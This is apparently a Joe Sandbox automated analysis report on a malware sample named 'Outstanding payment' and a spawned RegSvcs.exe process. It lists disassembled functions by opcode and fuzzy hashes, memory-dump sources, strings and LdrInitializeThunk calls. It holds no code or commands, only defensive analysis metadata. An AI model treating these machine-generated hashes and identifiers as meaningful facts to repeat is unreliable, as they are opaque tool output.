Source File: 00000000.00000002.2111035589.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_Outstanding payment.jbxd

Similarity

API ID:
String ID: YX7p$eMU
API String ID: 0-1002036398
Opcode ID: b1d29007588051e8a611a2376a7939a641b3ee3c34ee39b31eabffb800f87f89
Instruction ID: f2c9a827ca8aa02d2f761f89d34bf619e967ddc6af0e10d60fde6e5313bcac98
Opcode Fuzzy Hash: b1d29007588051e8a611a2376a7939a641b3ee3c34ee39b31eabffb800f87f89
Instruction Fuzzy Hash: 1781E174E15209DFCB48CFA9D59499EFBF1FF88210F14C56AE459EB220DB34AA42CB50

Function 0B2F4910 Relevance: 2.7, Strings: 2, Instructions: 173COMMON

Download Yara Rule

Strings

aY, xrefs: 0B2F4B11
18', xrefs: 0B2F4A6A

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: 18'$aY
API String ID: 0-535677718
Opcode ID: 05da38a96e3b93f35364088ab2a4b940a9f74c0fe18bf6e6b70bb45ff6a85bf5
Instruction ID: a11973048c05b849104cea7384f1bf92f9410309a72d347b76daf7227207c318
Opcode Fuzzy Hash: 05da38a96e3b93f35364088ab2a4b940a9f74c0fe18bf6e6b70bb45ff6a85bf5
Instruction Fuzzy Hash: B66119B4E2520A8FCB04DFA9C5C19AEFBB2FF88300F148526D525A7315D774A942CF95

Function 010959CA Relevance: 2.6, Strings: 2, Instructions: 117COMMON

Download Yara Rule

Strings

`Gap, xrefs: 01095AC0
J1, xrefs: 01095A8A

Memory Dump Source

Source File: 00000000.00000002.2111035589.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_Outstanding payment.jbxd

Similarity

API ID:
String ID: `Gap$J1
API String ID: 0-1473093699
Opcode ID: fa79326fa3982f39e1c2a7bc62ac8054a72d037ce17e89ac703fe811756f49ea
Instruction ID: 1efc67c2e42ed47efb3217d05d5bbf9264a02b6203c572fdfd5ba2a343ab832a
Opcode Fuzzy Hash: fa79326fa3982f39e1c2a7bc62ac8054a72d037ce17e89ac703fe811756f49ea
Instruction Fuzzy Hash: 94412870E0520ADFCB09CFAAC9915AEFBF2BF88300F24D46AC555A7254D7349A41DF94

Function 0B2F1B19 Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

]]o, xrefs: 0B2F1B77

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: ]]o
API String ID: 0-2636374853
Opcode ID: abc2cd2cc9904fb9bb0d0c011484f5fb1709d7e370e3b7c99438dd3a220f95d7
Instruction ID: ce3fd4efc9a1a61a26e59509a4767526139214c171ae26eac8f9089325f350e5
Opcode Fuzzy Hash: abc2cd2cc9904fb9bb0d0c011484f5fb1709d7e370e3b7c99438dd3a220f95d7
Instruction Fuzzy Hash: 2C814574E2420ADFCB04CFA9D4849AEFBB1FF89351F50856AD914A7364D334AA51CF90

Function 0B2F1B28 Relevance: 1.4, Strings: 1, Instructions: 171COMMON

Download Yara Rule

Strings

]]o, xrefs: 0B2F1B77

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: ]]o
API String ID: 0-2636374853
Opcode ID: 14334477c504171b9120807bdbc68f18d8ead941e1af33e35accd47c5864ccf0
Instruction ID: 86327262b70646501df29354588fde79927a7217a0b56abfea736c6cad9730e7
Opcode Fuzzy Hash: 14334477c504171b9120807bdbc68f18d8ead941e1af33e35accd47c5864ccf0
Instruction Fuzzy Hash: A3712174E2120ADBCB04CF99C084AAEFBB1BB89351F50852AD915B7324D374AA51CF94

Function 0B2F5CB9 Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

i#)6, xrefs: 0B2F5D59

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: i#)6
API String ID: 0-3600651614
Opcode ID: 7ed9e3b543c00c2e1307cd5bb6328d62d19ac9b61abf8bd02868c5fa0b6d8351
Instruction ID: 4201cc22ff56fdb2e2841ea57e92ece07116f29b63ecde586797df14032a5221
Opcode Fuzzy Hash: 7ed9e3b543c00c2e1307cd5bb6328d62d19ac9b61abf8bd02868c5fa0b6d8351
Instruction Fuzzy Hash: B7417B71E2620BCFCB08CFA6D5852AEFBF2EF95600F20D42AC115E7258D3749B458B95

Function 0B2F5CC8 Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

i#)6, xrefs: 0B2F5D59

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: i#)6
API String ID: 0-3600651614
Opcode ID: 404319c2cdaf932b2d6f645676b2a82a4c1423b2e1b28df67a9d41f17b3093f6
Instruction ID: 025cabdfd5687155e574316b59b2da92f485794aede5f4cd747a3cf298dd78a4
Opcode Fuzzy Hash: 404319c2cdaf932b2d6f645676b2a82a4c1423b2e1b28df67a9d41f17b3093f6
Instruction Fuzzy Hash: DA413971E2620BDFCB08CFA6C5856AEFBF2EF99700F20D42AC115A7254D37497418B95

Function 09BD77E0 Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119388638.0000000009BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9bd0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54aeb60ee45f3053cb64f628db8d0600deda3a4a8fd9e068681afdf7575406d7
Instruction ID: 94990dc7f327b1363c73a730487011b4e782b2c0fa7f054e14d24868c433849d
Opcode Fuzzy Hash: 54aeb60ee45f3053cb64f628db8d0600deda3a4a8fd9e068681afdf7575406d7
Instruction Fuzzy Hash: 7DD19EB0B026149FE729DB79C490BAE77FAEF89350F1484ADD14A9B290EF34D901CB51

Function 0B2FF6F0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 218694eb98d8070158dfab53cbeb8326eb9c0be0eab98427c233957c51c273df
Instruction ID: f2856efcd175aad7cf431fc903f0e824e36755b0934050ce9a30e99effe21722
Opcode Fuzzy Hash: 218694eb98d8070158dfab53cbeb8326eb9c0be0eab98427c233957c51c273df
Instruction Fuzzy Hash: E1E1F574E1121A8FDB15CFA9C5809AEFBF2FF89305F248169D514AB356D730A982CF60

Function 09BD02A0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119388638.0000000009BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9bd0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11ca9916fe194a633b96830a880019f951a368f0230942c2cba1e6e3a4539f9f
Instruction ID: 2cf682c3d3cfc20ced39e6d216f7d773081ebc491d354be2e31ef7edcad1ff8a
Opcode Fuzzy Hash: 11ca9916fe194a633b96830a880019f951a368f0230942c2cba1e6e3a4539f9f
Instruction Fuzzy Hash: ECE10774E012198FDB15DFA9C5809AEBBF2FF89315F248169E414AB356D730AD82CF60

Function 09BD0C50 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119388638.0000000009BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9bd0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fcdf06e72933129cadd8b0e2b7d907d0ccfd744280bb7a88c339f927039c2de
Instruction ID: a0495ef284d5cbc2370844dbbb48b1dabef99886febebe0074b940ef0df2e68c
Opcode Fuzzy Hash: 6fcdf06e72933129cadd8b0e2b7d907d0ccfd744280bb7a88c339f927039c2de
Instruction Fuzzy Hash: F2E11874E012198FDB15DFA9C5809AEBBF2FF89315F248169D414AB356D730AD82CF60

Function 0B2F51C0 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d90c159351843d20ed693edf519ecf111ba9871321e0b464224cc48933c921a
Instruction ID: f0f03e8303d880733cfbd80a753c53d641ceeecc65d4b43c1f364a481e0ca370
Opcode Fuzzy Hash: 0d90c159351843d20ed693edf519ecf111ba9871321e0b464224cc48933c921a
Instruction Fuzzy Hash: C4811074E2520ACFDB04CFA9D5809DEFBF2EF89210F24952AD514B7350E370AA42CB64

Function 0109C400 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2111035589.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4825fad2012453785f90f0b2860afaeb64ad3ebe25a8ac866fecff2683c739d2
Instruction ID: b5c808b3530eea486c37030b2ebe592809ccd4909f6e7ecb3d78b675255526be
Opcode Fuzzy Hash: 4825fad2012453785f90f0b2860afaeb64ad3ebe25a8ac866fecff2683c739d2
Instruction Fuzzy Hash: 1F913B74E15119CFDB14CFA9CA90AAEFBF2BF89304F2481A9D458AB315DB309A41CF50

Function 010920D2 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2111035589.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23032999d037177d88ee64466461ae3ac196708d1e4b9ddb4c0859cf09a062b1
Instruction ID: 1b75005befe5e9afbd7c7d0383450b22ec5673b7286ceac88a11a07f5f2b30ec
Opcode Fuzzy Hash: 23032999d037177d88ee64466461ae3ac196708d1e4b9ddb4c0859cf09a062b1
Instruction Fuzzy Hash: 937134B4E05209EFDF04CF99D4909AEFBB1EB98310F14916AE655AB254C3349A92CF90

Function 0B2F51D0 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e654d4a48bcfce000be725f5a70ce1fe8759a3e5e89128fdb32c451b68ff214a
Instruction ID: 9b7e290fb8a781f37c8f49c62e8d68370cfd05918a1f67504240b256c6b5e8c3
Opcode Fuzzy Hash: e654d4a48bcfce000be725f5a70ce1fe8759a3e5e89128fdb32c451b68ff214a
Instruction Fuzzy Hash: C2711374E2520ADFDB04CFA9D5808DEFBF2EF89210F24952AD515B7324E7709A418B64

Function 01094F08 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2111035589.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96c6231a41f7a271575f8300ad876bd7cd2cd06c3a33ea0269fdaea521228937
Instruction ID: c0c93631308c2bd803a74fdac8a49613e9bd0b4d3010fd34d93de3748ac0ac7e
Opcode Fuzzy Hash: 96c6231a41f7a271575f8300ad876bd7cd2cd06c3a33ea0269fdaea521228937
Instruction Fuzzy Hash: B071E2B4D0420ACFCF04CF99C5A49AEFBB1BF88310F54851AE569AB210D334A982DF94

Function 01094EF9 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2111035589.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 215b5e9e694c8e6152f733c1fc2c50ecc75a75425312a8b0ef319a061c0f135f
Instruction ID: 3ecc2fd86d5d1d47a85e1e5b863f73d1b6bd049f601bc4105986c04eb85d5c68
Opcode Fuzzy Hash: 215b5e9e694c8e6152f733c1fc2c50ecc75a75425312a8b0ef319a061c0f135f
Instruction Fuzzy Hash: A261E4B4D0420ADFCB04CFA9C5A49AEFBF1FF88210F188556E459EB215D334A982DF91

Function 010957B0 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2111035589.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e039877feb4146b36c095e421db83cadc7a0e70549b080895a4855263a45c85a
Instruction ID: c7ada942c43d79d5e6cab50206693bc9d39855ac6ff363dca1ed88a8a1a8f9d2
Opcode Fuzzy Hash: e039877feb4146b36c095e421db83cadc7a0e70549b080895a4855263a45c85a
Instruction Fuzzy Hash: F251DF74E14619CFDF08CFAAC9855EEBBF2FF89210F24942AD415BB214D7309A428F64

Function 010957A2 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2111035589.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0b1696e49473f70bb3e9fbe530eecfef59f5a0c58f422832913a61ff3eff007
Instruction ID: abf366b4e5ce34007af4788e7163465addf5c1c33892ad3ae0fb81090c0b7e31
Opcode Fuzzy Hash: c0b1696e49473f70bb3e9fbe530eecfef59f5a0c58f422832913a61ff3eff007
Instruction Fuzzy Hash: 2751F174E14619CFCF09CFAAC9805DEBBF2FF89210F24946AD445BB224D7349A428F64

Function 01090870 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2111035589.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 175618b7f536bb5c6078215292ba25d41d28f0cfa03b7e28cb341e6ed821fe07
Instruction ID: 2b03e78df2e9853827c383fac8155a1aa37099e0b0f082f2cccd66513394c182
Opcode Fuzzy Hash: 175618b7f536bb5c6078215292ba25d41d28f0cfa03b7e28cb341e6ed821fe07
Instruction Fuzzy Hash: 7A513870E05219DFDB14CFAAC89069EFBB6BF89300F14C1AAD859BB219D7305981DF61

Function 0B2F6459 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c83ec0a1082a3c2fb64cd21e4a58a447c9514eb83e96e5e2c05f585b16c3b93
Instruction ID: cae04fcb74bf7c49bbd3a1eaf2ccc9fc330367f81ea69ecc25a763a8be3c5066
Opcode Fuzzy Hash: 3c83ec0a1082a3c2fb64cd21e4a58a447c9514eb83e96e5e2c05f585b16c3b93
Instruction Fuzzy Hash: CF512574D2421ADFCF15CFA6D4802EEFBF2EB89200F14942AC125B6254E3789602CF65

Function 0B2F6468 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faf872d1570354f15f91dcc939bda4fceb6ab43281b72534aafb4c8bdabff910
Instruction ID: 4957a358eaa23807699f1b7b7d7b70fb4a011f4e4f3d18230aea0b61c768f5d6
Opcode Fuzzy Hash: faf872d1570354f15f91dcc939bda4fceb6ab43281b72534aafb4c8bdabff910
Instruction Fuzzy Hash: 82510374D2421ACFCF15CFAAD4806EEFBF2EB89201F54952AC125B6254D3789602CF69

Function 09BD0291 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119388638.0000000009BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9bd0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09ff85b2ddd4667b5a7308b8f7def942a835176816c87f1162842a7b6bfb1ffc
Instruction ID: f456809d0478ac84c880b364fb5c7c715a37e774095a2a9219233c2613656a49
Opcode Fuzzy Hash: 09ff85b2ddd4667b5a7308b8f7def942a835176816c87f1162842a7b6bfb1ffc
Instruction Fuzzy Hash: C5510A74E012198FDB15DFA9C5809AEFBF2FF89314F24C1A9D418AB256D7309982CF61

Function 09BD84E8 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119388638.0000000009BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9bd0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ec746ba8ba6b17ab8136bcc66099cba9a59e817a47810786bffb651bbb20fbb
Instruction ID: b96682d82001207c4f22f9f5131aec76e7488b6202875434e8c86b29f0c3c1b8
Opcode Fuzzy Hash: 6ec746ba8ba6b17ab8136bcc66099cba9a59e817a47810786bffb651bbb20fbb
Instruction Fuzzy Hash: 4A413AB0D1621ADFCB44CFA5C941ABEFBF1BB8A351F1499AAD025B7254E7388600CF54

Function 0B2F4FA0 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1c6c6634720a96dd22765b7e64f6494694b791fa0c6c0915ebaf2aeda94f864
Instruction ID: a0027bffa4cc1016e7559a97a92ac229b7053c59b6fba002479a9460227087c3
Opcode Fuzzy Hash: c1c6c6634720a96dd22765b7e64f6494694b791fa0c6c0915ebaf2aeda94f864
Instruction Fuzzy Hash: DA411B70D2520A8FCB44CFAAC4805AEFBF2BF88310F14C16AD525A7354D7749A41CFA4

Function 01095600 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2111035589.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66497f66492b6d608832b95baddbb210b87f70fcb62ca10f809b0b0ae51c388c
Instruction ID: bcdd54150662ea56d4c5d21760295070c83ad9eaab44887e318b4996885fa969
Opcode Fuzzy Hash: 66497f66492b6d608832b95baddbb210b87f70fcb62ca10f809b0b0ae51c388c
Instruction Fuzzy Hash: 6F4116B0D0560ADFDB05CFAAD9905EEFBF2BF88300F24C46AC455B7244D3359A418BA4

Function 01095610 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2111035589.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f91d61a5383b4cb765e51a6d4a6decff5d0edf511eb358dc6af73b30592216e
Instruction ID: aac4958053a58d76219f9bd4418c1d1623ac2498cba024fe1edaee157ed4acb9
Opcode Fuzzy Hash: 1f91d61a5383b4cb765e51a6d4a6decff5d0edf511eb358dc6af73b30592216e
Instruction Fuzzy Hash: E24104B0D0560ACBDF05CFAAD9905EEFBF2BB88300F28D56AC455B7204D3359A419F98

Function 0B2F4FB0 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c35ebaa42d73b1c2d72f3d47fb1622c405c65dac466675b09e68637f756c727
Instruction ID: 388b88cf7245b5f448d8b17d1ff4267fb5bfc5b7fe7a0eb21c825e5458ad9c9e
Opcode Fuzzy Hash: 5c35ebaa42d73b1c2d72f3d47fb1622c405c65dac466675b09e68637f756c727
Instruction Fuzzy Hash: FA410970D2160A8FCB04DFAAC5815AEFBF2BF88310F24C16AC529A7354D7749A41CFA4

Function 0B2F001F Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17f562d6157ef814924139b6e7f8201744393425b48963635b7ed30fae747bee
Instruction ID: 18958a7a122883ed07363e8001af72ae335611b1a3fc1ae52657e411faf3fdcb
Opcode Fuzzy Hash: 17f562d6157ef814924139b6e7f8201744393425b48963635b7ed30fae747bee
Instruction Fuzzy Hash: F2210E71D156498FEB19CF6B985469AFBF3AFC9200F08C4BAC808AB265DB341546CF52

Analysis Process: RegSvcs.exePID: 2820, Parent PID: 6252COMMON

Execution Graph

Execution Coverage:	0.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	58.8%
Total number of Nodes:	34
Total number of Limit Nodes:	2

Executed Functions

Function 01612B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(01640DBD,?,?,?,?,01634302), ref: 01612B6A

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34380866b42ece6ac60211f2d7ed126c69b7bbf17a28dc7f658f7bd6c7942f4a
Instruction ID: cbb91de27eb12c448937f5356a817a8e9e5ee2194a90650f999b277ed5e9784d
Opcode Fuzzy Hash: 34380866b42ece6ac60211f2d7ed126c69b7bbf17a28dc7f658f7bd6c7942f4a
Instruction Fuzzy Hash: C090026120281003410575584C15617404E97E0201B55C021E5014694EC92589916625

Function 01612C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0162FD4F,000000FF,00000024,016C6634,00000004,00000000,?,-00000018,7D810F61,?,?,015E8B12,?,?,?,?), ref: 01612C24

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5385377a252eb7e428f3053945a822a2edf85bde3d7c9845e2b22acac658ff25
Instruction ID: bfc8d285e806f97f66db87fa9c27ab3b297db8c9477e2633a6197d8b33fc86af
Opcode Fuzzy Hash: 5385377a252eb7e428f3053945a822a2edf85bde3d7c9845e2b22acac658ff25
Instruction Fuzzy Hash: A3B09B719019D5C6DA51E7644E09717795477D0701F29C065D3030755F4738C1D1E675

Function 01612BF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(01627BA5,000000FF,?,00000000,?,00001000,00000000,?,-00000018,7D810F61,?,?,?,?), ref: 01612BFA

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 630df219df73851381529783e37c03d6a4eb44f366f06aba509f2787b61f1dc8
Instruction ID: 8568c1121d67faf47896bf60325657d98b78aa78ee643513d2d1ec664fbbb709
Opcode Fuzzy Hash: 630df219df73851381529783e37c03d6a4eb44f366f06aba509f2787b61f1dc8
Instruction Fuzzy Hash: 9290023120181802D18075584C0564B004997D1301F95C015E4025758ECE158B597BA1

Function 01612AD0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(01649864,?,00000000,00000000,00000000,?,00000000,?,?,00000000,?,0161034A,?,?,?,00000003), ref: 01612ADA

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

